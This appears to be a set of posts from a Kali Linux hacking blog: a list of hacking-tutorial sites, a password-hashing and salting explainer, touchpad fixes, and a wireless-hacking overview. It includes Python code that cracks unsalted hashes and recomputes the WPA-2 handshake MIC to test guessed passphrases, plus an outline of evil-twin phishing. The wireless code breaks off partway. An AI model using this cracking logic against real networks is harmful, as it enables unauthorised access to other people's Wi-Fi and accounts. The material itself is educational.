
Tuesday, October 11, 2016

Top 5 Websites to Master Hacking With Kali Linux : For Beginners

Despite writing so many tutorials on hacking with Kali Linux, I often get stuck and have to consult other resources. My blog has a lot of things but since I myself don't know everything, there's no way I can provide all the resources that you guys need. Here's a list of top 5 websites about hacking with Kali Linux that have enough resources to answer 99.9% of your queries, and have enough tutorials to teach you most of the stuff you need to know to get to a level where you can read the more complex stuff on any website.

5. Null Byte

Not dedicated to Kali, but to white hat hacking in general.

  • Lot of high quality content
  • Many content creators / authors
  • Has a forum as well to ask questions
  • Active comments section
  • Not tailored to Kali
  • Navigation not very intuitive. Hard to find out stuff related to Kali.

4. Hacking-Tutorial

Very old website. Most websites in this list are fairly new, and probably didn't write tutorials for Backtrack (Kali is what came after Backtrack 5 R3, instead of a Backtrack 6). However, this website was around before the time of Backtrack 5 R1 (when the display manager was not started by default, and we had to use the startx command just to get a GUI). 

  • Lot of high quality content
  • Most articles pertain to Kali Linux or Backtrack (the old posts). The Backtrack ones will work with Kali without any changes in commands/procedure.
  • Only one author, so all posts are from one guy, which means fewer low-quality posts.
  • Design looks cluttered. Too many sharing widgets.
  • Only one author on this website; while that has its advantages, there are disadvantages too. There's only so much good stuff one person can write.

3. Hacking Tutorials

Fairly new, pretty looking and frequently updated website.

  • The homepage is quite good and has posts organized by categories.
  • Content is high quality (I said this for every damn website I posted here, but then they made it to the list because of the high quality content).
  • Has many tutorials that you may not find on other websites (most sites have redundant tutorials, all the sites I've mentioned here will have a post about aircrack-ng, etc., but this site has some uncommon attacks and tools covered as well).
  • Not well organized content. You might end up reading something whose prerequisites you don't know and you can't understand what's going on in the tutorial.
  • Some very long posts doing stuff no one gives a rat's ass about. Basically, lots of unnecessary content. I guess that comes as a side effect of having uncommon tutorials that won't be found on other websites. There's a reason why they aren't on most websites: no one is interested in reading them.

2. Black More Ops

Not limited to Kali Linux, has a lot of hacking tutorials.

  • While it's not limited to Kali, most of the content is focused on Kali
  • Again, lots of high quality content.
  • Navigation much easier
  • Some of the posts have nothing but a YouTube video, with no content to go along with it.
  • Some posts are news articles, instead of tutorials. Many people may not mind this, but some may.

1. Security Tube

This one has been around for ages too. However, it isn't providing any new free content anymore (but there's a lot of old content which is golden). The owner is now selling certified courses. (the creator is a badass, has written books, sells courses, discovered vulnerabilities and written attacks for WEP, etc.). 

  • Gold mine of resources if you're really interested in getting into hacking. No script kiddie stuff. The owner makes video tutorials and groups them up into megaprimers. Everything I know about wireless hacking I learnt from his wireless hacking megaprimer (the videos are free, the certification, if you want, will cost you).
  • I haven't stressed this enough, no script kiddie stuff. He actually has two assembly language megaprimers (again, free of cost).
  • Megaprimers use very old operating systems, mostly Backtrack 5.
  • Let's be honest, not everyone wants to watch 10 hours of video to learn the intricacies of hacking. Some are happy using tools and not caring about why or how they work. Unless you want to pursue a career in security, knowing how to use the tools would often be enough.
Despite the disadvantages, it's an awesome website. If you are really a security enthusiast, this is the go-to site. All the other sites I've mentioned, as well as my blog, can't give you the in-depth knowledge you can get from there. 

At last, I would stop pretending that I'm a selfless person who wants every one of his blog's visitors to go to competitor websites. The last item on the list, my own blog (yay!)-

Bonus : Kali Tutorials

My hobby blog. I am the main content creator. Over time, many have contributed. In one accident, all content by two of my friends was lost, and I became the sole author again. Recently, another author has joined in, and there are two of us now, but I still have to do most of the posting.

  • Kali is our (mine really, but ours sounds so cool, almost like I have a team of authors) utmost priority. Only a few tutorials are there that aren't related to Kali
  • Tried my best to make the navigation nice, and order the posts so that beginners can read them in order of difficulty.
  • Homepage sucks
  • I am the only person who replies to comments, and sometimes I can't reply to all. So many queries go unanswered.
  • Site slow af.
  • Only two authors. The other author focuses on YouTube videos, so mainly it's just me. So, not a lot of regular content.

PS: I'm looking for people who are willing to write content, mail me at if you're interested.
PPS: Would love to edit advantages/disadvantages based on comments (especially for my blog, since review of one's own work is bound to be inaccurate and biased). Let me know how you feel. This article represents my personal views, and it'd be awesome to be able to incorporate a wider perspective on the basis of comments.

Sunday, September 18, 2016

Has your password been leaked?

Don't want to read the theory? Just want to see if your password has been leaked. Click here or scroll down.

How websites store data

When you create an account on a website, the website stores your registration details in its SQL databases. Very few people, even within the company/website, have direct access to the databases.

In a naive world, the database would contain your plaintext passwords. However, since there are hackers doing SQL injection attacks to dump the database data, it's helpful to keep the password hashed/encrypted. This would mean that even if someone has access to the table, he would see your username, email address, and hashed password, but not the plain-text password.

Those who don't know about hashing may wonder how the website checks if you are typing the correct password during login, if the site itself doesn't know your password. Well, to understand that, you must understand what hashing is. You can read it up on Wikipedia for a technical idea, but I'll (grossly over-)simplify it for you.

Hashing is any operation which is easy in one direction, and difficult in reverse. For example, mixing two colors is easy, while finding out the constituent colors of a color mixture isn't quite that easy. Multiplying two large (prime) numbers is easy, but given a huge prime number, it isn't easy to find the two prime factors which multiplied result in that number.
Hashing example

Let's say your password is "pass", and there's a hashing function f(x). Then, 
f("pass") = d@A2qAawqq21109 (say).
Going the forward way is quite simple. On the other hand, figuring out the plain-text password from the hash (d@A2qAawqq21109) is almost impossible.

So, when you create an account and you type the password as "pass", d@A2qAawqq21109 is stored in the database. When you log in and type the password as "pass", the server hashes it, and it becomes "d@A2qAawqq21109", which is matched against the SQL database. If you typed some other password, say "ssap", then the hash generated would be different, and you wouldn't be able to log in. Note that while the hashing function gives different outputs for most strings, every once in a while there may be collisions (two strings may have the same hash). This is very very very rare, and shouldn't be of any concern to us.

Forgot Your Password - Ever wondered why almost all websites give you a new password when you forget your old one, instead of just telling you your password. Well, now you know, it turns out that they themselves don't know your password, and hence can't tell you. When they offer you a chance to change your password, they just change the corresponding hash in their tables, and now your new password works.

How hashes are cracked - I wrote earlier that hash functions are easy to go one way, but almost impossible to go the other. The task of going the other way can be accomplished by the brute-force method. Basically, suppose someone had the password "pass". Now, a hacker who only has access to the hashes can hash all the passwords in alphabetical order and then check which hash matches (assume the hacker knows the password is four characters long and contains only letters). 
He tries 'aaaa', 'aaab', 'aaac', ...... 'aaba', 'aabb', 'aabc', ..... 'aazz', 'abaa', ................ 'paaa', 'paab', .. , 'pass'. When he tries 'aaaa', the hash is not d@A2qAawqq21109, it is something else. Until he reaches 'pass', every hash he gets fails to match d@A2qAawqq21109. But for 'pass', the hash matches. So, the hacker now knows your password.

Website leaks

Due to the above reason, website leaks are bad, but not that bad. If the passwords are sufficiently complex, the hashing algorithm is secure, and a salt (explained later) is used, then it's quite unlikely that the hackers would be able to get many passwords from the database dump. So, even if the Facebook DB is leaked, your passwords are most probably safe. Unfortunately, "most probably" is not something one can work with, especially when you have so much to lose in case the 0.1% chance of your password being compromised is the one that materializes. So, after a DB leak, the website often asks all its users to change their passwords (e.g. the Dropbox leak, the LinkedIn leak, the Myspace leak, etc.). Also, since you might be using the same password on different websites, it's important that you change your password everywhere.

This isn't even the worst part though. Some websites don't hash your passwords, and store them in plain-text instead. If their database is leaked, the hacker has immediate access to millions of accounts on that website, plus possibly tens of millions of accounts on other websites which use the same email/username - password combination. For example, the 000webhost database had plain-text passwords, and it was leaked. I personally hosted a site there once, and my account was compromised as well. 

But this still isn't the worst part. The hackers often dump the databases publicly. The responsible ones let the website know that their security sucks, and ask them to inform their customers about the leak and get their passwords changed. After sufficient time is given to the website to act, the hacker would often dump the database publicly. To see the extent of this, take 000webhost's example. The first search result for "000webhost leak" gives you the database, which you can download and see the passwords. The password I was using 3-4 years ago is there in the database. That very password is probably still there on some of the websites that I signed up for 3-4 years ago but haven't used since then (and hence didn't update the password). 

Problem 1 : Suppose there's a hashing scheme X. Under that scheme, "pass" becomes d@A2qAawqq21109. Now this is a very secure scheme and every website uses it. Now, there's a guy who has a lot of computational power and he computes the hashes of all possible letter combinations under scheme X. Now, given a hashed value, he can simply look up his table and see which password it corresponds to. He makes this table of word to hash available online. Now, it's quite easy to get the passwords from a database dump. 

Problem 2 : Alternatively, even if the scheme isn't common, what one can do is take a common password, say "password", hash it, and then search all the users in the 100 million user password dump and see if any hash matches. If it does, then that means that the given user has the password "password". By using 1 million common passwords, he'll probably get 10% of the users' passwords among the 100 million users.

Solution : Hashing Salt - To prevent that, each user chooses a password, and is given a random string, the hashing salt. The hashing function operates on both the password and the salt. So, if two users have the same password but different salts, then they'll have different hashes. This renders both the above techniques/problems useless. Now, to get the correct hash, the hacker has to input the correct password and the correct salt to the hashing function. This means that -

  1. The first problem, where someone else pre-computed the password-hash table, is solved, since now that person has to make a password-salt-hash table (for every password and every salt combination, what's the hash), which is going to be too many possible combinations. If there are 10 million possible passwords, and 10 million possible salts, there would be 100 million million combinations (I don't even know what a million million even is). If there are 10 common salts which are used very often, then the person can make a table with all the 10 million passwords hashed for the 10 common salts. Alternatively, the person can hash the 10 most common passwords with the 10 million possible salts. Thus, it's important to have both strong passwords and random salts.
  2. The second problem is also kind of solved, since the person would have to compute the hash of each common password with each salt in the table (note that he doesn't have to do it for all 10 million salts, only the ones present in the table). Again, not using easy generic passwords like "password", "hello", etc. would solve this issue.
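A small worked example of the two problems and the salt fix described above, added here and not part of the original post: the candidate list and the accounts are constructed, and SHA-256 stands in for "scheme X" to keep it short (a real site should use a deliberately slow password hash such as bcrypt, scrypt or Argon2 rather than a bare SHA-256).

```python
import hashlib
import secrets

# Constructed candidate list, standing in for the "1 million common
# passwords" from the post.
COMMON_PASSWORDS = ["123456", "hello", "qwerty", "password", "letmein", "pass"]

# Constructed accounts: two users share a weak password, one has a strong one.
ACCOUNTS = {"alice": "password", "bob": "password", "carol": "9Vq#tLz!r2Wd"}


def hash_unsalted(password):
    """Scheme X from the post: one password, one fixed hash, everywhere."""
    return hashlib.sha256(password.encode()).hexdigest()


def hash_salted(password, salt):
    """The salt is part of the hashed input, so the same password hashed under
    two different salts gives two unrelated digests."""
    return hashlib.sha256(salt + password.encode()).hexdigest()


def make_unsalted_dump(accounts=ACCOUNTS):
    """What a leaked table looks like under scheme X: username -> hash."""
    return {user: hash_unsalted(pw) for user, pw in accounts.items()}


def make_salted_dump(accounts=ACCOUNTS):
    """Salted storage: username -> (salt, hash). The salt is random per user
    and stored in the clear; it only has to be unpredictable, not secret."""
    dump = {}
    for user, pw in accounts.items():
        salt = secrets.token_bytes(16)
        dump[user] = (salt, hash_salted(pw, salt))
    return dump


def precompute_table(candidates=COMMON_PASSWORDS):
    """Problem 1: hash every candidate once, ahead of time, and publish the
    hash -> password mapping. Cost: len(candidates) hashes, paid once."""
    return {hash_unsalted(p): p for p in candidates}


def crack_unsalted(dump, table):
    """Problem 2 against scheme X: one dictionary lookup per leaked hash and
    no hashing at all at crack time. Returns (recovered, hashes_computed)."""
    recovered = {user: table[h] for user, h in dump.items() if h in table}
    return recovered, 0


def crack_salted(dump, candidates=COMMON_PASSWORDS):
    """Against salted storage the precomputed table is worthless: each user's
    salt forces a fresh hash of every candidate, so the work multiplies by the
    number of users. Weak passwords still fall; strong ones do not."""
    recovered, work = {}, 0
    for user, (salt, h) in dump.items():
        for p in candidates:
            work += 1
            if hash_salted(p, salt) == h:
                recovered[user] = p
                break
    return recovered, work


def demo():
    """Run both scenarios on the constructed accounts and report what changed."""
    plain = make_unsalted_dump()
    got_plain, _ = crack_unsalted(plain, precompute_table())

    salted = make_salted_dump()
    got_salted, work = crack_salted(salted)
    return {
        # Under scheme X alice and bob are visibly the same password.
        "same_hash_unsalted": plain["alice"] == plain["bob"],
        # With per-user salts the two identical passwords look unrelated.
        "same_hash_salted": salted["alice"][1] == salted["bob"][1],
        "cracked_unsalted": got_plain,
        "cracked_salted": got_salted,
        "hashes_at_crack_time_salted": work,
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```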

Weak salts? One of the flaws with hashing is that it could have weak salts. WPA/WPA-2 is quite robust, but since it uses the SSID of the network as the salt, routers which use default SSIDs ("linksys", "netgear", etc.) are more vulnerable than others, since rainbow tables exist which have hashes for the most common passwords under the most common SSIDs. That said, I'd like to reiterate, WPA/WPA-2 is still quite damn secure, and I pointed this out only as a relevant example.

Are you compromised?

Out of all the leaks so far, I had accounts in 4 of the leaks. My account was there in the Myspace leak, the LinkedIn leak, the dropbox leak, and the 000webhost leak. I had to change my password on multiple sites on multiple occasions. 

One way to find out if you're compromised is to look for all the dumps and check manually if you're in them. However, that's practically impossible (not all dumps are public, and looking for your name/email in a huge file takes the computer more time than you'd guess). Fortunately, there's a website which specifically exists for this purpose, known as LeakedSource. You can search using your email free of cost. They offer some extra functionality for pretty affordable rates ($4 paypal, $2 bitcoin). 

I am compromised

If you find out that your account is indeed compromised, then I suggest you quickly change your password on all services that you use which have the same password. Better yet, change all your passwords. It's good practice to keep changing your passwords regularly anyway. Also, if a website has a two-step authentication feature, then it's suggested that you use it.

Sunday, September 11, 2016

Kali Linux : Touchpad issues - tapping, reverse/natural scrolling

Since I've started using Kali Linux, I have often encountered problems with my touchpad. The problem can either be with tapping (tapping the touchpad doesn't result in a click, and I have to press the physical button), or with scrolling (two finger scrolling doesn't work).

I have come across the following 3 fixes. At least one of them should work for you-

Fix 1: Easiest - GUI setting

This fix requires no fancy commands. You just have to go to Mouse & Touchpad settings and make appropriate changes. To go to the settings, you can either-
  • Press the windows key (on the lower bottom, Ctrl key, Function key, Windows key, Alt key), and type mouse in the search bar that shows up.
  • Click the activities button on the top left, and type mouse in the search bar that shows up.

Now, you should see something like this-

You can check the tap to click and two finger scroll options and your problem is solved.

If, however, you see something like this-

Then you have to use the next fixes, as the Mouse and Touchpad settings are useless for you.

Fix 2 : Tapping and reverse Scroll

If you are able to scroll just fine, but your touchpad is not registering the taps, then just type this command into the terminal-
synclient tapbutton1=1
This should enable tapping for you.

In my case, I had scrolling working without any problems, but I prefer natural scrolling, and that option wasn't there for me in mouse & touchpad settings. However, if you type synclient into the terminal, you see something like this-

    Parameter settings:
        LeftEdge                = 1618
        RightEdge               = 5366
        TopEdge                 = 1356
        BottomEdge              = 4536
        FingerLow               = 25
        FingerHigh              = 30
        MaxTapTime              = 180
        MaxTapMove              = 251
        MaxDoubleTapTime        = 100
        SingleTapTimeout        = 180
        ClickTime               = 100
        EmulateMidButtonTime    = 75
        EmulateTwoFingerMinZ    = 282
        EmulateTwoFingerMinW    = 7
        VertScrollDelta         = 114
        HorizScrollDelta        = 114
        VertEdgeScroll          = 0
        HorizEdgeScroll         = 0
        CornerCoasting          = 0
        VertTwoFingerScroll     = 1
        HorizTwoFingerScroll    = 0
        MinSpeed                = 1
        MaxSpeed                = 1.75
        AccelFactor             = 0.035014
        TouchpadOff             = 0
        LockedDrags             = 0
        LockedDragTimeout       = 5000
        RTCornerButton          = 0
        RBCornerButton          = 0
        LTCornerButton          = 0
        LBCornerButton          = 0
        TapButton1              = 1
        TapButton2              = 0
        TapButton3              = 0
        ClickFinger1            = 1
        ClickFinger2            = 1
        ClickFinger3            = 1
        CircularScrolling       = 0
        CircScrollDelta         = 0.1
        CircScrollTrigger       = 0
        CircularPad             = 0
        PalmDetect              = 0
        PalmMinWidth            = 10
        PalmMinZ                = 200
        CoastingSpeed           = 20
        CoastingFriction        = 50
        PressureMotionMinZ      = 30
        PressureMotionMaxZ      = 160
        PressureMotionMinFactor = 1
        PressureMotionMaxFactor = 1
        GrabEventDevice         = 0
        TapAndDragGesture       = 1
        AreaLeftEdge            = 0
        AreaRightEdge           = 0
        AreaTopEdge             = 0
        AreaBottomEdge          = 0
        HorizHysteresis         = 28
        VertHysteresis          = 28
        ClickPad                = 0

You can quickly notice the VertScrollDelta parameter (delta usually refers to a change; here it is the finger movement needed for one scroll event, which is what sets the scrolling speed), which for me is set to 114. I decided to check if making it -114 would make it scroll at the same speed but in the opposite direction. To test that, I tried the following command-
synclient VertScrollDelta=-114
And turns out I was right and it did reverse the direction of scrolling.

Little problem

These changes that we made aren't persistent, and the synclient settings would revert to default every time you start your system again. There are many solutions to this, one of which is editing files in /usr/share/X11/xorg.conf.d/. However, these files tend to get overwritten and we have to deal with a lot of other mess to fix that behavior.

Instead, we will use a very simple solution, and just run the above two commands on system startup.

Add the commands to startup

Step 1 : Navigate to the .config directory
cd ~/.config/
Step 2 : Check if autostart folder exists
Step 3: If it doesn't exist, create the folder. If it exists, skip this step
mkdir autostart
Step 4: Navigate to autostart folder
cd autostart
Step 5: Use your favorite text editor (vim vs. Sublime Text?) (or cat). I'm using leafpad to make things look less intimidating.
leafpad script.desktop
Step 6: A leafpad window will pop up. Paste one of the following into the window, then save and close leafpad.
If you are logged in as root (probably the case)
[Desktop Entry]

If you are logged in as another user (if you created a non-superuser account)
[Desktop Entry]
Exec=/home/<name here>/

Note 1 : To find the <name here> in second case, just navigate to home (cd ~) and find present working directory (pwd)
Note 2 : (If you're curious why I didn't use ~ and instead made two different scripts for root and other users) Exec=~/ didn't work for me. Maybe it does work in general, and there was some other factor in play for me, or maybe it isn't supposed to work at all. Not sure. Any comments in this regard are welcome.

Step 7: Change directory to home.
cd ~
Step 8: Create a file called
Step 9: Paste the following code into it. Then save.

    #!/bin/sh
    synclient tapbutton1=1          # enable tap to click
    synclient VertScrollDelta=-114  # reverse the direction of scrolling

PS: Paste only the synclient lines required by you. Keep the first line: it tells the system to run the file with /bin/sh when the autostart entry executes it.

Step 10: Make it executable (a+x is enough; chmod 777 also makes the script writable by every user on the system, which you don't want for a file that runs at every login)
chmod a+x
Restart Kali and see if your tapping and reverse scroll are still working. If not, go through the steps again and see what you missed. Everything is case sensitive so you have to be very careful in that regard.


If typing the commands into the terminal worked for you, but automation by adding the commands to startup didn't, then here is one simple troubleshooting tip to isolate the problem.

Open a terminal and type
If your tapping/reverse scrolling is working fine now, then your script is fine, but the autostart directory content is not. Recheck steps 1 to 6.
If your tapping/reverse scrolling isn't working fine, then your script is flawed. Recheck step 7 to 10.

Fix 3 : modprobe method

I found out about this method here. It did fix a few things for me, but like the second reply on the thread, what happened with me was- 

Earlier my scroll was working and tap to click wasn't
After running the commands
Tap to click started working and two finger scroll stopped working

Also, even when my scroll was working it wasn't natural scroll and that's a bit inconvenient for me. So, Fix 2 above was the best fix for me. However, I've included this fix because it seems to work with most people. So here it is- 

Step 1 : Open a terminal. 
Step 2 : Type the following commands. Your mouse pointer will stop working after typing the first command and will resume working (hopefully with the touchpad problems solved) after the second.
modprobe -r psmouse 
modprobe psmouse proto=imps


To make the change persistent, follow these steps-

Step 1 : Navigate to required directory
cd /etc/modprobe.d/
Step 2 : Open text editor
leafpad whatever.conf
Step 3:  Paste this-
options psmouse proto=imps

Step 4: Save and exit

Restart and see if the changes are persistent. 

Again, I reiterate, this method is based on a fix I found on Kali Forums, and you should read further there if you are facing any problems.

That said, if you are facing any problems, then feel free to comment. If you followed the guide but had to do something a bit different to get it working, then also comment, as it may help others.

Friday, September 9, 2016

Things You Should Know : Wireless Hacking Intermediate

In the previous post in the 'things you should know' series I discussed Wireless Hacking basics. It's recommended that you go through it before starting this tutorial.


You should know (all this is covered in Wireless Hacking basics)-
  • What are the different flavors of wireless networks you'll encounter and how difficult it is to hack each of them.
  • What are hidden networks, and whether they offer a real challenge to a hacker.
  • Have a very rough idea how each of the various 'flavors' of wireless networks is actually hacked.


You will know -
  • Even more about the different flavors of wireless networks.
  • How to go about hacking any given wireless network.
  • Common tools and attacks that are used in wireless hacking.

The last two points will be covered in detail in the coming posts. Here you'll get a rough idea of the cryptographic aspects of each 'flavor' of wireless network security, along with the vulnerabilities and the attacks against them.

Pirates of the Caribbean

Suppose you are in ship manufacturing business. These are times when pirates were rampaging the seas. You observed how the merchant ships are all floating unguarded in the seas, and the pirate industry is booming because of easy targets. You decide to create fortified ships, which can defend themselves against the pirates. For this, you use an alloy X. Your idea was appreciated by merchants and everyone started using your ships....

Unfortunately, your happiness was short lived. Soon, the pirates found out flaws in your ships and any pirate who knew what he was doing could easily get past your ship's defense mechanisms. For a while you tried to fix the known weaknesses in the ship, but soon realized that there were too many problems, and that the very design of the ship was flawed.

You knew what flaws the pirates were exploiting, and could build a new and stronger ship. However, the merchants weren't willing to pay for new ships. You then found out that by remodeling some parts of the ship in a very cost efficient way, you could make the ship's security almost impenetrable. In the coming years, some pirates found a few structural weaknesses in alloy X, and some issues with the core design of the ship (remnant weaknesses of the original ship). However, these weaknesses were rare and your customers were overall happy.

After some time you decided to roll out an altogether new model of the ship. This time, you used a stronger alloy, Y. Also, you knew all the flaws in the previous versions of the ship, and didn't make any errors in the design this time. Finally, you had a ship which could withstand constant bombardment for months on end, without collapsing. There was still scope for human error, as the sailors can sometimes be careless, but other than that, it was an invincible ship.

WEP, WPA and WPA-2

WEP is the flawed ship in the above discussion. The aim of the Wireless Alliance was to write an algorithm to make wireless networks (WLAN) as secure as wired networks (LAN). This is why the protocol was called Wired Equivalent Privacy (privacy equivalent to the one expected in a traditional wired network). Unfortunately, while in theory the idea behind WEP sounded bullet-proof, the actual implementation was very flawed. The main problems were static keys and weak IVs. For a while attempts were made to fix the problems, but nothing worked well enough (WEP2, WEPplus, etc. were made but all failed).

WPA was a new WLAN standard which was compatible with devices using WEP encryption. It fixed pretty much all the flaws in WEP encryption, but the limitation of having to work with old hardware meant that some remnants of WEP's problems would still continue to haunt WPA. Overall, however, WPA was quite secure. In the above story, this is the remodeled ship.

WPA-2 is the latest and most robust security algorithm for wireless networks. It wasn't backwards compatible with many devices, but these days all the new devices support WPA-2. This is the invincible ship, the new model with a stronger alloy.

But wait...

In last tutorial I assumed WPA and WPA-2 are the same thing. In this one, I'm telling you they are quite different. What's the matter?

Well actually, the two standards are indeed quite different. However, while it's true there are some remnant flaws in WPA that are absent in WPA-2, from a hacker's perspective, the technique to hack the two networks is often the same. Why?
  • Very few tools exist which carry out the attacks against WPA networks properly (the absence of proof-of-concept scripts means that you have to do everything from scratch, which most people can't).
  • All these attacks work only under certain conditions (key renewal period must be large, QoS must be enabled, etc.)
Because of these reasons, despite WPA being a little less secure than WPA-2, most of the time, a hacker has to use brute-force/dictionary attack and other methods that he would use against WPA-2, practically making WPA and WPA-2 the same thing from his perspective.

PS: There's more to the WPA/WPA-2 story than what I've captured here. Actually, WPA or WPA-2 are ambiguous descriptions, and the actual intricacy (PSK, CCMP, TKIP, X/EAP, AES w.r.t. the cipher used and the authentication used) would require diving further into the personal and enterprise versions of WPA as well as WPA-2.

How to Hack

Now that you know the basics of all these networks, let's get to how these networks are actually hacked. I will only name the attacks; further details will be provided in coming tutorials-

WEP

The initialization vector (IV) passed to the RC4 cipher is the weakness of WEP

Most of the attacks rely on inherent weaknesses in IVs (initialization vectors). Basically, if you collect enough of them, you will get the password.
  1. Passive method
    • If you don't want to leave behind any footprints, then passive method is the way to go. In this, you simply listen to the channel on which the network is on, and capture the data packets (airodump-ng). These packets will give you IVs, and with enough of these, you can crack the network (aircrack-ng). I already have a tutorial on this method, which you can read here - Hack WEP using aircrack-ng suite.
  2. Active methods
    • ARP request replay - The above method can be incredibly slow, since you need a lot of packets (there's no way to say how many; it can literally be anything due to the nature of the attack, but usually the number of packets required ends up in five digits). Getting that many packets can be time consuming. However, there are many ways to speed up the process. The basic idea is to initiate some sort of conversation in the network, and then capture the packets that arise as a result of the conversation. The problem is, not all packets have IVs. So, without having the password to the AP, you have to make it generate packets with IVs. One of the best ways to do this is by requesting ARP packets (which have IVs and can be generated easily once you have captured at least one ARP packet). This attack is called the ARP replay attack. We have a tutorial for this attack as well, ARP request replay attack.
    • Chopchop attack
    • Fragmentation attack
    • Caffe Latte attack
I'll cover all these attacks in detail separately (I really can't summarize the bottom three). Let's move to WPA-

WPA-2 (and WPA)

There are no vulnerabilities here that you can easily exploit. The only two options we have are to guess the password or to fool a user into giving us the password.

  1. Guess the password - For guessing something, you need two things: guesses (duh) and validation. Basically, you need to be able to make a lot of guesses, and also be able to verify whether they are correct or not. The naive way would be to enter the guesses into the password field that your OS provides when connecting to the wifi. That would be slow, since you'd have to do it manually. Even if you write a script for that, it would take time since you have to communicate with the AP for every guess (multiple times for each guess, at that). Basically, validation by asking the AP every time is slow. So, is there a way to check the correctness of our password without asking the AP? Yes, but only if you have a 4-way handshake. Basically, you need to capture the series of packets transmitted when a valid client connects to the AP. If you have these packets (the 4-way handshake), then you can validate your password against them. More details on this later, but I hope the abstract idea is clear. There are a few different ways of guessing the password :-
    • Bruteforce - Tries all possible passwords. It is guaranteed to work, given enough time, but even for 8-character alphanumeric passwords that time is impractically long (62^8, roughly 2×10^14 candidates, each costing a full PBKDF2 computation). This method is only useful if the password is short and you know that it is composed only of digits.
    • Wordlist/Dictionary - In this attack there is a list of words which are possible candidates for the password. These wordlist files contain English words, combinations of words, misspellings of words, leaked real-world passwords, and so on. There are some huge wordlists which are many GBs in size, and many networks can be cracked using them. However, there's no guarantee that the password of the network you are trying to crack is in the list. These attacks do complete within a reasonable timeframe.
    • Rainbow table - The validation against the 4-way handshake mentioned earlier works like this: the guessed passphrase is run through a slow hash (WPA uses PBKDF2, 4096 rounds of HMAC-SHA1) to get a 256-bit key called the PMK, a session key is derived from the PMK plus the nonces and MAC addresses seen in the handshake, and that session key is used to recompute the integrity check (MIC) on one of the handshake frames. If the recomputed MIC matches the captured one, the guess was right. The PBKDF2 step is the CPU-intensive part and is the limiting factor in how many keys per second you can test (this is why so many tools use GPUs instead of CPUs for cracking). A possible shortcut: whoever made the wordlist could also precompute the PBKDF2 output for every entry, so that only the cheap per-handshake part is left. Unfortunately, WPA/WPA-2 salts the hash, which means two networks with the same password can have different PMKs if they use different salts. What is the salt? The network's name (SSID). So two networks with the same SSID and the same password have the same PMK, and the person building the table has to build a separate one per SSID. Practically, tables are generated for the most common SSIDs (the defaults routers ship with, like linksys, netgear, belkin, etc.). If the target network has one of those SSIDs, cracking time drops dramatically because the precomputed PMKs can be used directly. These precomputed tables are commonly called rainbow tables (strictly they are plain lookup tables of precomputed PMKs rather than rainbow tables in the chain/reduction sense, but the name has stuck). Note that these tables are significantly larger than the wordlists they were built from: we saved cracking time at the cost of a much larger file (some are hundreds of GBs). This is referred to as a time-memory tradeoff. This page has rainbow tables for the 1000 most common SSIDs.
  2. Fool a user into giving you the password - This is basically a combination of a man in the middle attack and social engineering; more specifically, of an evil twin and phishing. You first force a client off the original WPA-2 network, then get them to connect to a fake open network that you create with the same name, and then serve them a login page in their browser asking for the network's password. You might wonder why the fake network has to be open, with the password asked for in the browser (why not just create a WPA-2 network with the same name and let the user hand us the password directly?). The answer is that WPA-2 performs mutual authentication during the 4-way handshake: the client verifies that the AP knows the password and the AP verifies that the client knows it, and throughout the process the password itself is never sent, only values derived from it. Without the password we cannot complete the handshake, so the client's OS simply reports a failed connection. (A fake WPA-2 AP does still get something: the client's second handshake message carries a MIC computed from the password, which is enough material for offline cracking. But that just puts you back on the guessing route this attack is meant to avoid.)
  3. Bonus : WPS vulnerability and reaver [I have covered it in detail separately so I'm not explaining it again (I'm only human, and a very lazy one too)]
The WPA-2 4-way handshake. Both the AP and the client authenticate each other.
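To make the "validate against the handshake" idea concrete, here is an added example (not code from this blog or from aircrack-ng) that does the whole offline check in Python: passphrase to PMK with PBKDF2 (SSID as salt), PMK to PTK with the 802.11i PRF over the nonces and MAC addresses, and KCK to EAPOL MIC with HMAC-SHA1 as WPA-2 does it (WPA/TKIP uses HMAC-MD5 for the MIC instead). The SSID, MAC addresses, nonces, EAPOL bytes and the "captured" MIC are all constructed here so the example runs offline; the MIC is generated from the secret passphrase exactly as a real client would have produced it. The same code then shows the two speeds discussed above: a plain wordlist run that pays the PBKDF2 cost per candidate, and a per-SSID precomputed PMK table that skips it.

```python
import hashlib
import hmac

# --- constructed sample "capture" (not real traffic) -----------------------
SSID = b"HomeNet"
AP_MAC = bytes.fromhex("001122334455")       # BSSID, seen in beacons and EAPOL frames
CLIENT_MAC = bytes.fromhex("66778899aabb")   # the station that (re)connected
ANONCE = bytes(range(32))                    # sent by the AP in message 1
SNONCE = bytes(range(32, 64))                # sent by the client in message 2
# Bytes of EAPOL-Key message 2 with its 16-byte MIC field zeroed. A real frame
# has a proper header, key info and RSN IE; placeholder bytes are fine here
# because only "which bytes were MIC'd" matters for the check.
EAPOL_MSG2 = bytes.fromhex("0103007502010a00") + bytes(8) + SNONCE + bytes(64)


def derive_pmk(passphrase: str, ssid: bytes) -> bytes:
    """WPA/WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes).
    The SSID is the salt, which is why precomputed tables are per-SSID and
    why this step is where all the CPU (or GPU) time goes."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"), ssid, 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """IEEE 802.11i PRF-n: concatenated HMAC-SHA1(key, label || 0x00 || data || i)."""
    out = b""
    for i in range((nbytes + 19) // 20):
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:nbytes]


def derive_ptk(pmk: bytes, ap: bytes, client: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK for CCMP (48 bytes = KCK | KEK | TK) from the PMK plus the values in
    messages 1 and 2. Nothing secret crosses the air, only nonces and MACs."""
    data = min(ap, client) + max(ap, client) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 48)


def eapol_mic(kck: bytes, eapol_mic_zeroed: bytes) -> bytes:
    """WPA2 (key descriptor version 2): MIC = HMAC-SHA1(KCK, frame)[:16]."""
    return hmac.new(kck, eapol_mic_zeroed, hashlib.sha1).digest()[:16]


def mic_for(pmk: bytes, hs: dict) -> bytes:
    """The cheap per-handshake part: PRF + one HMAC, given a PMK."""
    kck = derive_ptk(pmk, hs["ap"], hs["client"], hs["anonce"], hs["snonce"])[:16]
    return eapol_mic(kck, hs["eapol"])


# What airodump-ng would hand you: the public values above plus the MIC the
# client really sent. Generated here with the "unknown" passphrase so the
# example is self-contained.
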